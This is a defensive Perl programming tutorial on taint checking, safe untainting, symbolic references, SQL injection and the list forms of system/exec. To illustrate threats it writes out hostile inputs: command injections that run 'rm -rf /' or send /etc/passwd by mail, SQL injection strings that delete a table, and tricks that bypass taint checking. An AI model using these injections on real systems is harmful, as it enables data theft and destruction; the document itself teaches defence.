Linux dan Pemrograman: Secure Programming Techniques

I can’t control how people run my programs or what input they give it, and given the chance, they’ll do everything I don’t expect. This can be a problem when my program tries to pass on that input to other programs. When I let just anyone run my programs, like I do with web applications, I have to be especially careful. Perl comes with features to help me protect myself against that, but they only work if I use them, and use them wisely.

Bad Data Can Ruin Your Day

If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:

open my $fh, $file or die "Could not open [$file]: $!";

That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do such things as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:

my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG};

How can that cause problems? Look at the documentation for open. Have you ever read all of the 400-plus lines in its entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page! Several of those ways involve opening a pipe to another program:

open my $fh, "wc -l *.pod |";

open my $fh, "| mail joe@example.com";

To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:

% perl program.pl "| mail joe@example.com"

% FOO_CONFIG="rm -rf / |" perl program.pl

This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone eventually gets to the point where they can compromise the system.

There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything open can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.
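As a preview, here is a minimal sketch of one such precaution: the three-argument form of open, which keeps the mode separate from the filename so a | in the data can't turn a file open into a pipe open. The open_for_reading name is a hypothetical helper I made up for illustration, and the sketch assumes there is no file literally named "echo pwned |" in the current directory:

```perl
use strict;
use warnings;

# open_for_reading is a hypothetical helper, not part of any module.
# The three-argument open takes the mode ('<') separately, so perl treats
# $file strictly as a filename, even if it starts or ends with a |.
sub open_for_reading {
    my( $file ) = @_;
    open my $fh, '<', $file or return;
    return $fh;
}

# This looks for a file literally named "echo pwned |"; no command runs.
my $fh = open_for_reading( 'echo pwned |' );
print defined $fh ? "Opened a file\n" : "No such file, and no pipe either\n";
```

This doesn't validate the name at all. It only removes one way that unexpected data can change what open does.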

Taint Checking

Configuration is all about reaching outside the program to get data. When users choose the input, they can choose what the program does. This is more important when I write programs for other people to use. I can trust myself to give my own program the right data (usually), but other users, even those with the purest of intentions, might get it wrong.

Under taint checking, Perl doesn’t let me use unchecked data from outside the source code to affect things outside the program. Perl will stop my program with an error. Before I show more, though, understand that taint checking does not prevent bad things from happening. It merely helps me track down areas where some bad things might happen and tells me to fix those.

When I turn on taint checking with the -T switch, Perl marks any data that come from outside the program as tainted, or insecure, and Perl won’t let me use those data to interact with anything outside of the program. This way, I can avoid several security problems that come with communicating with other processes. This is all or nothing. Once I turn it on, it applies to the whole program and all of the data.

Perl sets up taint checking at compile time, and it affects the entire program for the entirety of its run. Perl has to see this option very early to allow it to work. Here’s a toy program that uses the external command echo to print a message:

#!/usr/bin/perl
# tainted_args.pl

system qq|echo "Args are -> @ARGV"|;

When I run this normally, there’s no problem:

% perl tainted_args.pl Amelia
Args are -> Amelia

When I specify the -T switch on the command line, I turn on taint checking and run into a problem. The values in %ENV are tainted, and the one that causes trouble here is PATH, which something like system or exec might use to locate an external program (but more on that coming up):

% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.

If I always want taint checking, I can put it on the shebang line:

#!/usr/bin/perl -T
# tainted_args_shebang.pl

system qq|echo "Args are -> @ARGV"|;

When I run perl without the -T while -T is on the shebang line, I have a problem:

% perl tainted_args_shebang.pl Amelia
"-T" is on the #! line, it must also be used on the command line at tainted_args_shebang.pl line 1.

If I call the program with perl, I have to specify the -T in both places, which brings me back to the same error:

% perl -T tainted_args_shebang.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args_shebang.pl line 4.

I can get rid of this duplication by not using perl and running the program directly:

% ./tainted_args_shebang.pl Amelia
Insecure $ENV{PATH} while running with -T switch at ./tainted_args_shebang.pl line 4.

Now I fix that error by getting rid of the PATH key in %ENV and using the full path to echo in my system call:

#!/usr/bin/perl -T
# tainted_args_no_path.pl
delete $ENV{PATH};

system qq|/bin/echo "Args are -> @ARGV"|;

Now I have another problem:

% ./tainted_args_no_path.pl foo
Insecure dependency in system while running with -T switch at ./tainted_args_no_path.pl line 5.

I tried to interpolate @ARGV into that system call, but that’s tainted too. I show how to fix that later.

Warnings Instead of Fatal Errors

With the -T switch, taint violations are fatal errors, and that’s generally a good thing. However, if I’m handed a program developed without careful attention paid to taint, I still might want to run the program. It’s not my fault it’s not taint safe yet, so perl has a gentler version of taint checking.

The -t switch (that’s the little brother to -T) does the same thing as normal taint checking but merely issues warnings when it encounters a problem. This is only intended as a development feature so I can check for problems before I give the public the chance to try its data on the program:

% perl -t tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -t switch at tainted_args_no_path.pl line 5.
Args are -> Amelia

I get the same message, but this time it is only a warning and the program continues.

Similarly, the -U switch lets Perl perform otherwise unsafe operations, effectively turning off taint checking. Perhaps I’ve added -T to a program that is not taint safe yet, but I’m working on it and want to see it run even though I know there is a taint violation:

% perl -TU tainted_args_no_path.pl Amelia
Args are -> Amelia

I still have to use -T on the command line, though, or I get a “too late” message, much like the complaint I got earlier when I left off the -T, and the program does not run:

% perl -U tainted_args_no_path.pl Amelia
Too late for "-T" option at tainted_args_no_path.pl line 1.

If I also turn on warnings (as I always do, right?), I’ll get the taint warnings just like I did with -t.

% perl -TU -w tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -T switch at tainted_args_no_path.pl line 5.
Args are -> Amelia

Inside the program, I can check the actual situation by looking at the value of the Perl special variable ${^TAINT}. It’s true if I have enabled any of the taint modes (including with -U), and false otherwise. For normal, fatal-error taint checking it’s 1 and for the reduced effect, warnings-only taint checking it’s -1. Don’t try to modify it; it’s a read-only value. Remember, it’s either all or nothing with taint checking.
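Here is a small sketch of reading that variable. The taint_mode_label subroutine is a name I invented for the example; the three values it handles are the ones just described:

```perl
use strict;
use warnings;

# taint_mode_label is a hypothetical helper that turns the read-only
# ${^TAINT} value into something a person can read.
sub taint_mode_label {
    my( $flag ) = @_;
    return $flag ==  1 ? 'fatal errors'
         : $flag == -1 ? 'warnings only'
         :               'off';
}

print "Taint checking: ", taint_mode_label( ${^TAINT} ), "\n";
```

Running this with plain perl, with -T, and with -t should show the three different labels.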

Automatic Taint Mode

Sometimes Perl turns on taint checking for me. When Perl sees that the real and effective users or groups are different (so, I’m running the program as a different user or group than I’m logged in as), Perl realizes that I have the opportunity to gain more system privileges than I normally have and turns on taint checking. This way, when other users have to use my program to interact with system resources, they don’t get the chance to do something they shouldn’t by carefully selecting the input. That doesn’t mean the program is secure; it’s only as secure as using taint checking wisely can make it.

mod_perl

Since I have to enable taint checking early in Perl’s run, mod_perl needs to know about tainting before it runs a program. In my Apache server configuration, I use the PerlTaintCheck directive for mod_perl 1.x:

PerlTaintCheck On

In mod_perl 2, I include -T in the PerlSwitches directive:

PerlSwitches -T

I can’t use this in .htaccess files or other, later configurations. I have to turn it on for all of mod_perl, meaning that every program run through mod_perl, including otherwise normal CGI programs run with ModPerl::PerlRun or ModPerl::Registry, uses it. This might annoy users for a bit, but when they get used to the better programming techniques, they’ll find something else to gripe about.

Tainted Data

Data are either tainted or not. There isn’t any part- or half-taintedness. Perl only marks scalars (data or variables) as tainted, so although an array or hash may hold tainted data, they aren’t tainted themselves. Perl never taints hash keys, which aren’t full scalars with all of the scalar overhead. Remember that because it comes up later.

I can check for taintedness in a couple of ways. The easiest is the tainted function from Scalar::Util:

#!/usr/bin/perl -T
# check_taint.pl

use Scalar::Util qw(tainted);

# this one won't work
print "ARGV is tainted\n" if tainted( @ARGV );

# this one will work
print "Argument [$ARGV[0]] is tainted\n" if tainted( $ARGV[0] );

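When I specify arguments on the command line, they come from outside the program so Perl taints them. The tainted function takes a single scalar, so tainted( @ARGV ) only sees the number of elements, which isn’t tainted. The @ARGV array itself is fine, but its first element, $ARGV[0], isn’t: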

% check_taint.pl foo
Argument [foo] is tainted
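Since tainted only looks at one scalar at a time, checking a whole array means checking each element. This is a small sketch of that idea; count_tainted is a name I made up for the example:

```perl
use strict;
use warnings;
use Scalar::Util qw(tainted);

# count_tainted is a hypothetical helper: it checks each element on its
# own and returns how many of them Perl has marked as tainted.
sub count_tainted {
    return scalar grep { tainted( $_ ) } @_;
}

printf "%d of %d arguments are tainted\n",
    count_tainted( @ARGV ), scalar @ARGV;
```

Without taint checking turned on, nothing is ever tainted, so the count stays at zero no matter what I pass on the command line.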

Any subexpression that involves tainted data inherits taintedness. Tainted data are viral. The next program uses File::Spec to create a path in which the first part is my home directory. I want to open that file, read it line by line, and print those lines to standard output. That should be simple, right?

#!/usr/bin/perl -T
# show_file.pl
use strict;
use warnings;

use File::Spec;
use Scalar::Util qw(tainted);

my $path = File::Spec->catfile( $ENV{HOME}, "data.txt" );

print "Result [$path] is tainted\n" if tainted( $path );

open my $fh, $path or die "Could not open $path";

print while( <$fh> );

The problem is the environment. All of the values in %ENV come from outside the program, so Perl marks them as tainted. Any value I create based on a tainted value becomes tainted as well. That’s a good thing, since $ENV{HOME} can be whatever the user wants, including something malicious, such as this line that starts off the HOME directory with a | and then runs a command. This variety of attack has actually worked to grab the password files on big web sites that do a similar thing in CGI programs. Even though I don’t get the passwords, once I know the names of the users on the system, I’m ready to spam away:

% HOME="| cat ../../../etc/passwd;" ./show_file.pl

Under taint checking, I get an error because Perl catches the | character I tried to sneak into the filename:

Insecure dependency in piped open while running with -T switch at ./show_file.pl line 12.

Side Effects of Taint Checking

When I turn on taint checking, Perl does more than just mark data as tainted. It ignores some other information because it can be dangerous. Taint checking causes Perl to ignore PERL5LIB and PERLLIB. A user can set either of those so a program will pull in any code he wants. Instead of finding the File::Spec from the Perl standard distribution, my program might find a different one if an impostor File/Spec.pm shows up first during Perl’s search through @INC for the file. When I run my program, Perl finds some File::Spec, and when it tries one of its methods, something different might happen.

To get around an ignored PERL5LIB, I can use the lib module or the -I switch, which is fine with taint checking (although it doesn’t mean I’m safe):

% perl -Mlib=/Users/brian/lib/perl5 program.pl

% perl -I/Users/brian/lib/perl5 program.pl

I can even use PERL5LIB on the command line. I’m not endorsing this, but it’s a way people can get around your otherwise good intentions:

% perl -I$PERL5LIB program.pl

Also, Perl treats the PATH as dangerous. It’s something that the person running this program can set to anything they like. Otherwise, I could use the program running under special privileges to write to places where I shouldn’t. Even then, I can’t trust the PATH for the same reason that I can’t trust PERL5LIB. I can’t tell which program I’m really running if I don’t know where it is. In this example, I use system to run the cat command. I don’t know which executable it actually is because I rely on the path to find it for me:

#!/usr/bin/perl -T
# cat.pl

system "cat /Users/brian/.bashrc"

Perl’s taint checking catches the problem:

Insecure $ENV{PATH} while running with -T switch at ./cat.pl line 3.

Using the full path to cat in the system command doesn’t help by itself. Rather than figuring out when the PATH should apply and when it shouldn’t, Perl always treats it as insecure, so I also have to remove PATH from the environment:

#!/usr/bin/perl -T

delete $ENV{PATH};

system "/bin/cat /Users/brian/.bashrc"

In a similar way, the other environment variables such as IFS, CDPATH, ENV or BASH_ENV can be problems. Their values can have hidden influence on things I try to do within my program.
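The perlsec documentation suggests cleaning up the environment near the top of a taint-checked program. This sketch follows that advice. The particular PATH value is my assumption and should list only directories that I trust on the system at hand:

```perl
use strict;
use warnings;

# Replace the inherited PATH with a short list of trusted directories.
# The value here is an assumption; choose it to fit the local system.
$ENV{PATH} = '/bin:/usr/bin';

# Remove the other variables that can quietly change what a shell does.
delete @ENV{ qw(IFS CDPATH ENV BASH_ENV) };

print "PATH is now $ENV{PATH}\n";
```

Assigning a literal string to $ENV{PATH} gives it an untainted value, which is an alternative to deleting the key outright.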

Untainting Data

The only approved way to untaint data is to extract the good parts of it using the regular expression memory matches. By design, Perl does not taint the parts of a string that I capture in regular expression memory, even if Perl tainted the source string. Perl trusts me to write a safe regular expression. Again, it’s up to me to make it safe.

In this line of code, I untaint the first element of @ARGV to extract a filename. I use a character class to specify exactly what I want. In this case, I only want letters, digits, underscores, dots, and hyphens. I don’t want anything that might be a directory separator:

my( $file ) = $ARGV[0] =~ m/\A([A-Z0-9_.-]+)\z/i;

I constrain the regular expression so it has to match the entire string, too. That is, if it contains any characters that I didn’t include in the character class, the match fails. I’m not going to try to change invalid data into good data. You’ll have to think about how you want to handle that for each situation.
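To make the all-or-nothing behavior concrete, here is a minimal sketch that wraps the same kind of match in a subroutine and tries it on a few strings. The untaint_filename name and the sample inputs are mine, chosen only for illustration:

```perl
use strict;
use warnings;

# untaint_filename is a hypothetical helper. It returns the name only if
# the whole string is made of allowed characters, and undef otherwise.
sub untaint_filename {
    my( $input ) = @_;
    return undef unless defined $input;

    # \A and \z pin the match to the very start and very end of the string
    my( $clean ) = $input =~ m/\A([A-Za-z0-9_.-]+)\z/;
    return $clean;
}

for my $candidate ( 'data.txt', '../etc/passwd', "data.txt\n", '| rm -rf /' ) {
    my $clean = untaint_filename( $candidate );
    print defined $clean ? "accepted: $clean\n" : "rejected\n";
}
```

Only the first candidate passes. The character class still admits names such as . and .., so a real program might want an extra check for those.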

It’s really easy to use this incorrectly and some people annoyed with the strictness of taint checking try to untaint data without really untainting it. I can remove the taint of a variable with a trivial regular expression that matches everything:

my( $file ) = $ARGV[0] =~ m/(.*)/s;

If I want to do something like this, I might as well not even use taint checking. You might look out for this if you require your programmers to use taint checking and they want to avoid the extra work to do it right. I’ve caught this sort of statement in many code reviews, and it always surprises me that people get away with it.

I might be more diligent and still wrong, though. The character class shortcuts, \w and \W (and the POSIX version [:word:]), actually take their definitions from the locales. As a clever cracker, I could manipulate the locale setting in such a way to let through the dangerous characters I want to use. Instead of the implicit range of characters from the shortcut, I should explicitly state which characters I want. I can’t be too careful. It’s easier to list the allowed characters and add ones that I miss than to list the forbidden characters, since it also excludes problem characters I don’t know about yet.

If I turn off locale support, this isn’t a problem and I can use the character class shortcuts again. Perl uses the internal locale instead of the user setting (from LC_CTYPE for regular expressions). After turning off locale, \w is just ASCII letters, digits, and the underscore:

{
no locale;

my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

Mark Jason Dominus noted in his http://perl.plover.com/yak/security/ talk that there are two approaches to constructing regular expressions for untainting data, which he labels as the Prussian Stance and the American Stance. I’ve also seen these called “whitelisting” and “blacklisting”. In the Prussian Stance, I explicitly list only the characters I allow. I know all of them are safe:

# Prussian = safer
my( $file ) = $ARGV[0] =~ m/([a-z0-9_.-]+)/i;

The American Stance is less reliable. Doing it that way, I list the characters I don’t allow in a negated character class. If I forget one, I still might have a problem. Unlike the Prussian Stance, where I only allow safe input, this stance relies on me knowing every character that can be bad. How do I know I know them all?

# American = uncertainty
my( $file ) = $ARGV[0] =~ m/([^\$%;|]+)/i;

I prefer something much stricter where I don’t extract parts of the input. If some of it isn’t safe, none of it is. I anchor the character class of safe characters to the beginning and end of the string. I don’t use the $ anchor since it allows a trailing newline:

# Prussian = safer
my( $file ) = $ARGV[0] =~ m/^([a-z0-9_.-]+)\z/i;

In some cases, I don’t want regular expressions to untaint data. Even though I matched the data the way I wanted, I might not intend any of that data to make its way out of the program. I can turn off the untainting features of regular expression memory with the re pragma:

{
use re 'taint';

# $file still tainted
my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

A more useful and more secure strategy is to turn off the regular expression untainting globally and only turn it back on when I actually want to use it. This can be safer because I only untaint data when I mean to:

use re 'taint';

{
no re 'taint';

# $file not tainted
my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

IO::Handle::untaint

The IO::Handle module, which is the basis for the line input operator behavior in many cases, can untaint data for me. Since input from a file is also external data, it is normally tainted under taint checking:

use Scalar::Util qw(tainted);

open my $fh, '<', $0 or die "Could not open myself! $!";

my $line = <$fh>;

print "Line is tainted!\n" if tainted( $line );

I can tell IO::Handle to trust the data from the file. As I’ve said many times before, this doesn’t mean I’m safe. It just means that Perl doesn’t taint the data, not that it’s safe. I have to explicitly use the IO::Handle module to make this work, though:

use IO::Handle;
use Scalar::Util qw(tainted);

open my $fh, '<', $0 or die "Could not open myself! $!";

$fh->untaint;

my $line = <$fh>;

print "Line is not tainted!\n" unless tainted( $line );

This can be a dangerous operation since I’m getting around taint checking in the same way my /(.*)/ regular expression did.

Hash Keys

You shouldn’t do this, but as a Perl master (or quiz show contestant) you can tell people they’re wrong when they try to tell you that the only way to untaint data is with a regular expression. You shouldn’t do what I’m about to show you, but it’s something you should know about in case someone tries to do it near you.

Hash keys aren’t full Perl scalar values (as in the data structure in the Perl guts, commonly called an SV), so they don’t carry all the baggage and accounting that allows Perl to taint data. Hash keys are just strings without annotations, so any magic that might have been attached to the SV doesn’t stick to the hash key. If I pass the data through a filter that uses the data as hash keys and then returns the keys, the data are no longer tainted, no matter their source or what they contain:

#!/usr/bin/perl -T

use Scalar::Util qw(tainted);

print "The first argument is tainted\n"
    if tainted( $ARGV[0] );

@ARGV = keys %{ { map { $_, 1 } @ARGV } };

print "The first argument isn't tainted anymore\n"
    unless tainted( $ARGV[0] );

I’ve run into people doing this inadvertently as they take user input or configuration and stick it into a hash. The hash values are still tainted, but I might be able to sneak in bad keys that way.

Don’t do this. I’d like to put that first sentence in all caps, but I know the editors aren’t going to let me do that, so I’ll just say it again: don’t do this. Save this knowledge for a Perl quiz show, and maybe tear it out of this book before you pass it on to a coworker.

Taint::Util

There’s a CPAN module, Taint::Util, from Ævar Arnfjörð Bjarmason that makes it really easy to untaint any data:

use Taint::Util;
untaint $ENV{PATH};

It messes with the scalar value directly behind the scenes. But, it lets me go the other way too. I can taint data even if perl didn’t already do that for me:

use Taint::Util;

my $camel = 'Amelia';
taint $camel;

I might do this when I’m creating a bunch of potentially dangerous data that I don’t intend to ever leave the program, so I taint it myself. This is an especially paranoid, but not completely unreasonable, approach to keeping data inside the program. This is also a good utility for testing when you want to check the behavior of something when it encounters tainted data. Combining this with Test::Taint can be quite useful.

Choosing Untainted Data with Tainted Data

Another exception to the usual rule of tainting involves the conditional operator. Earlier I said that a tainted value also taints its expression. That doesn’t quite work for the conditional operator when the tainted value is only in the condition that decides which value I get. As long as the chosen value is not tainted, the result isn’t tainted either:

my $value = $tainted_scalar ? "Amelia" : "Shlomo";

This doesn’t taint $value because the conditional operator is really just shorthand for a longer if-else block in which the tainted data aren’t in the expressions connected to $value. The tainted data only show up in the conditional:

my $value = do {
    if( $tainted_scalar ) { "Amelia"   }
    else                  { "Shlomo" }
    };

Symbolic References

A symbolic reference uses the value of a scalar as the name of a variable. This happens when I use a nonreference as a reference:

my $name = 'Amelia';

$$name = 'Camel';  # sets $Amelia

I tried to dereference $name. Since that variable wasn’t a reference, perl used the value in that variable, Amelia, as the name of the variable that it would assign to.

I can do this with any of the data types, including the names of subroutines:

my $sub_name = time % 2 ? 'make_camel' : 'make_llama';

&$sub_name( @arguments );

I can use a symbolic method name too:

my $method = time % 2 ? 'make_camel' : 'make_llama';
$object->$method( @arguments );

This is a useful feature for a dynamic language, but it’s also a dangerous feature. If I take those subroutine or method names from user data, I might inadvertently let the user do things I had not anticipated. This is particularly pernicious because a user can sneak in a fully qualified subroutine name:

my $method = $ARGV[0];   # POSIX::exit
$object->$method( @arguments );

Here’s a small program that implements a simple interpreter that’s designed to let the user decide which subroutine they want to run:

# repl.pl
use v5.10;
use POSIX;
use Cwd qw(getcwd);

say "Cwd is ", getcwd();
REPL: {
    print ">>> ";
    local $_ = <>;   # lexical "my $_" was removed in v5.24
    last REPL if ! defined $_ or /quit/;

    chomp;
    my( $operation, $operand ) = split /\s+/;

    my $value = eval { &$operation( $operand ) };
    say "$operation( $operand ) => $value";
    redo;
    }

sub factorial {
    my $p = 1;
    $p *= $_ foreach ( 1 .. $_[0] );
    $p
    }

sub summerial {
    my $p = 0;
    $p += $_ foreach ( 1 .. $_[0] );
    $p
    }

say "Cwd is now ", getcwd();
say "Got to the end";

My run starts innocently enough as I call the two subroutines I defined, but then I sneak in POSIX::chdir:

% perl repl.pl
Cwd is /Users/Amelia
>>> factorial 5
factorial( 5 ) => 120
>>> summerial 9
summerial( 9 ) => 45
>>> POSIX::chdir /Volumes/Scratch
POSIX::chdir( /Volumes/Scratch ) => 1
>>> quit
Cwd is now /Volumes/Scratch
Got to the end

After I leave the loop, I see that I’ve changed the current working directory. A more complicated program might read from files it shouldn’t or leave behind files I won’t notice.

I can do the same with a method call through a quirk of Perl’s method lookup. If I give a full package specification in the method, perl calls exactly that subroutine even if it has nothing to do with the class.

# other_method.pl
use v5.10;
use CGI;

package Camel {
    sub new   { bless {}, $_[0] }
    sub clone { ... }
    }

my( $method, @args ) = @ARGV;
$method //= 'new';

my $object = Camel->$method( @args );

say "object is type $object";

I run it first with no argument, which selects the new method by default, and I get back the Camel object that I expect:

% perl5.14.2 other_method.pl
object is type Camel=HASH(0x7f8413806268)

When I call it with CGITempFile::new, I get a CGITempFile object back:

% perl5.14.2 other_method.pl CGITempFile::new
object is type CGITempFile=SCALAR(0x7fefd3031130)

I chose that class for a reason. Its DESTROY method tries to unlink a file. I didn’t give an additional argument so it has no file to try to remove. The CGITempFile class comes from the CGI module, which shipped with Perl until v5.22 and is still likely to be installed. I can potentially delete a file doing this.

If I want to choose a subroutine or method based on a variable’s value, there are several things I can do to ensure I don’t allow too much. My most common tactic is to make a lookup table of allowed names:

use v5.10;   # for state
use Carp qw(croak);

sub _is_allowed {
    my( $self, $method ) = @_;
    state $allowed = {
        some_sub => 1,
        };

    return exists $allowed->{$method};
    }

if( $self->_is_allowed( $method ) ) {
    $self->$method( @arguments );
    }
else {
    croak "Disallowed method! [$method]";
    }

I stay away from solutions that check the form of the value, for instance ensuring that there are only identifier characters:

if( $method =~ /\A\p{ID_Start}\p{ID_Continue}*\z/ ) {
    $self->$method( @arguments );
    }
else {
    croak "Disallowed method! [$method]";
    }

A class might have more subroutines defined in the symbol table than I anticipate, especially if other modules imported symbols. I typically don’t want to allow something to call any defined subroutine. Not only that, a subroutine name that has the right form might not be defined. That would cause a fatal error when I try to call it.
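For plain subroutines, a related approach is a dispatch table that maps each allowed name straight to a code reference, so there is no symbolic reference left for the user to steer. This is a sketch under my own assumptions: it reuses the factorial and summerial subroutines from repl.pl, and run_operation is a name I invented:

```perl
use strict;
use warnings;

sub factorial { my $p = 1; $p *= $_ for 1 .. $_[0]; $p }
sub summerial { my $p = 0; $p += $_ for 1 .. $_[0]; $p }

# Only the names listed here can ever be called.
my %dispatch = (
    factorial => \&factorial,
    summerial => \&summerial,
);

# run_operation is a hypothetical wrapper around the table lookup.
sub run_operation {
    my( $operation, $operand ) = @_;

    # A name that isn't in the table has no code reference, so I stop here
    my $code = $dispatch{$operation}
        or die "Disallowed operation! [$operation]\n";

    return $code->( $operand );
}

print "factorial( 5 ) => ", run_operation( 'factorial', 5 ), "\n";
```

With this in place, a request for POSIX::chdir dies with the "Disallowed operation" message instead of changing the directory, because that string is simply not a key in the table. The same lookup also guarantees that the subroutine exists before I call it.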

Defensive Database Programming with DBI

It used to be that buffer overflows were the major source of security problems. Now that the world seems to be run by database servers, SQL injection attacks are more worrisome. If I didn’t know any better, I might make a database query by interpolating user data into a string that I then send to a database server. I’m still using -T, but as I said before, it’s a development aid, not a guarantee. There are two big problems in this code:

#!/usr/bin/perl -T

use CGI;
use DBI;

my $cgi   = CGI->new;
my $dbh   = DBI->connect( ... ); # fill in the details yourself
my $name  = $cgi->param( 'username' );

my $query = "SELECT * FROM Users WHERE name='$name'";

my $result = $dbh->selectrow_hashref( $query, ... );

First, I have no idea what the value of $name is. What if it has a literal single-tick in it? What if $name is Amelia' OR name='root? Once I interpolate the string, my query looks like:

SELECT * FROM Users WHERE name='Amelia' OR name='root'

The results of the query, which I’ve now crafted in a special way, might return information I’m not supposed to have. Have you ever wondered why you can’t have spaces or punctuation in your web site usernames? Most likely the application can’t handle this very situation (probably because the programmers are lazy, not because the technology is inferior), so they simply limit the characters you can use.

I could be even more malicious by trying to corrupt a database. Instead of expanding the SELECT statement in my last example, I can try to run a completely new SQL statement. What if the HTML form username is Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='?

SELECT * FROM Users WHERE name='Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name=''
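I don't need a database to see how the interpolation goes wrong. This sketch only builds the query strings and prints them. The naive_query subroutine is a hypothetical stand-in for the interpolation in the program above:

```perl
use strict;
use warnings;

# naive_query is a hypothetical helper that repeats the mistake on
# purpose: it drops the user's value straight into the SQL text.
sub naive_query {
    my( $name ) = @_;
    return "SELECT * FROM Users WHERE name='$name'";
}

# An honest username, then the two hostile ones from the text
print naive_query( $_ ), "\n" for
    q(Amelia),
    q(Amelia' OR name='root),
    q(Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name=');
```

Each hostile value closes the quote that I opened and then supplies its own SQL, which is why the database server can't tell my part of the statement from the user's part.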

There are plenty of people sitting at their computer figuring out exactly what they should put in the right place to make your application do something like this. Some do it for fun, but some do it for profit. There are even more people with nothing better to do than download rootkits and penetration programs they don’t understand just so they can mess with you just to impress their friends at your expense.

DBI can handle arbitrary values in queries without a problem. I use placeholders instead of Perl’s string interpolation. The placeholder, represented as a literal question mark, ?, reserves a spot for the value that I will use later. I make a statement handle with prepare:

my $sth = $dbh->prepare("SELECT * FROM Users WHERE name=?");

When it’s time for me to run the query, I use the statement handle’s execute method to fill in the placeholders. I think of this like I do sprintf. The first argument to execute goes in the first placeholder, and so on:

my $rc = $sth->execute( $name );

The placeholder magic automatically quotes the values and escapes any special characters in the value. Quote characters in the data are no longer quote characters, semicolons don’t create new statements, and so on. No more SQL injection vulnerability! Not only that, but once I’ve prepared a query, I can easily re-use it simply by calling execute again.

I still haven’t solved the whole problem here. I’ve prevented the SQL injection attack, but I still haven’t dealt with the actual value. Even if it maintains my original query, the value might make it do something I don’t intend.

Back in my example, I know that $name is tainted, but in this program I mistakenly discount that because I don’t think it will matter. I’m not running a shell command with it, so it must be safe, right?

By default, DBI doesn’t care about tainted data. If I’m being paranoid though (and that’s a good thing when it comes to security, remember), I want to scrub any data before I use them outside the program, and a database server is outside the program. Perl’s not going to stop me from using tainted data with DBI, so I tell DBI to handle that by setting TaintIn when I connect. Setting TaintIn only works if I’ve turned on taint-checking:

my $dbh = DBI->connect( $dsn, $user, $password,
    { TaintIn => 1, ... }
    );

I can also set TaintIn for just a particular statement handle:

my $sth = $dbh->prepare(
    "SELECT * FROM Users WHERE name=?",
    { TaintIn => 1, ... }
    );

That’s only half of it though. Once I get the results back, should I trust that data? It does come from outside the program, so maybe I shouldn’t trust it. Not too many people think about the threats from within. To taint the data in the results, I set TaintOut:

my $dbh = DBI->connect( $dsn, $user, $password,
    {
    TaintIn  => 1,
    TaintOut => 1,
    ...
    }
    );

Alternatively, I can just set Taint and get them both at the same time:

my $dbh = DBI->connect( $dsn, $user, $password,
    { Taint => 1, ... }
    );

Either way, DBI will taint its results, and I have to handle them just as I would any other tainted data. That might seem like a lot of work for something that might never happen, but remember it only needs to happen once to make a big mess and a lot more work for you.

And, before I move on, I’ll write one more thing about this particular example. It’s not about Perl (or any other language); an application should never be able to do more than I intend it to do. I might have tricked my SELECT into also running a DELETE, but if my CGI script only needs to read data, it shouldn’t have the permissions to do anything to change the data, whether that means updating it, adding it, or even deleting it. Likewise, any program that is supposed to only add data shouldn’t be able to read or update other records. Any server that I should use in these situations will have a way to define users or groups where you can minutely control the permissions. My program uses the appropriate credentials for the job I want it to do.

List Forms of system and exec

If I use either system or exec with a single argument, Perl looks in the argument for shell metacharacters. If it finds any, Perl passes the argument to the underlying shell for interpretation. Knowing this, I could construct a shell command that does something the program does not intend. Perhaps I have a system call that seems harmless, like the call to echo:

system( "/bin/echo $message" );

As a user of the program, I might try to craft the input so $message does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:

'Hello World!'; mail joe@example.com < /etc/passwd

Taint checking can catch this, but it’s still up to me to untaint it correctly. As I’ve shown, I can’t rely on taint checking alone to be safe. Instead, I can use system and exec in the list form. In that case, Perl uses the first argument as the program name and calls execvp directly, bypassing the shell and any interpolation or translation it might do:

system "/bin/echo", $message;
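To see the difference without doing any damage, I can capture what echo prints in each form. This sketch uses a pipe open instead of system so that I can read the output; a pipe open follows the same rule, where a single string may go to the shell and a list never does. The output_of helper and the harmless "injected" command are assumptions for illustration, and the sketch assumes a Unix-like system with /bin/echo:

```perl
use strict;
use warnings;

# Hypothetical helper: run a command and return its output lines.
# With one element Perl may hand the string to the shell; with
# several elements it calls the program directly.
sub output_of {
    my @command = @_;
    open my $fh, '-|', @command or die "Could not run [@command]: $!";
    chomp( my @lines = <$fh> );
    close $fh;
    return @lines;
}

my $message = 'Hello; echo INJECTED';

# Single string: the shell splits the command at the semicolon.
my @via_shell = output_of( "/bin/echo $message" );

# List form: echo receives the whole message as one literal argument.
my @direct = output_of( '/bin/echo', $message );

print "shell:  $_\n" for @via_shell;
print "direct: $_\n" for @direct;
```

The single string form should come back with two lines, because the shell ran a second command, while the list form should come back with one line that still contains the semicolon.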

Using an array with system does not automatically trigger its list processing mode. If the array has only one element, system only sees one argument. If system sees any shell metacharacters in that single scalar element, it passes the whole command to the shell, special characters and all:

@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.

To get around this special case, I can use the indirect object notation with either of these functions. Perl uses the indirect object as the name of the program to call and interprets the arguments just as it would in list form, even if the list only has one element. Although this example looks like it might include $args[0] twice, it really doesn’t. It’s a special indirect object notation that turns on the list processing mode and assumes that the first argument is the command name:

system { $args[0] } @args;

